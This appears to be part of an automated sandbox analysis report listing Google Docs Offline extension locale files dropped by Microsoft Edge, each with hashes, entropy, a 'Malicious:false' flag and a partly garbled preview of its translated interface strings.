                                                                                                                                                                                                                                                                                      SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2846
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                      MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                      SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                      SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                      SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):934
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                      MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                      SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                      SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                      SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):963
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                      MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                      SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                      SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                      SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1320
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                      MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                      SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                      SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                      SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):884
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                      MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                      SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                      SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                      SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):980
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                      MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                      SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                      SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                      SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wuser popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1941
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                      MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                      SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                      SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                      SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1969
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                      MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                      SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                      SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                      SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1674
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                      MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                      SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                      SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                      SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1063
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                      MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                      SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                      SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                      SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1333
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                      MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                      SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                      SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                      SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1263
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                      MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                      SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                      SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                      SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1074
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                      MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                      SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                      SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                      SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
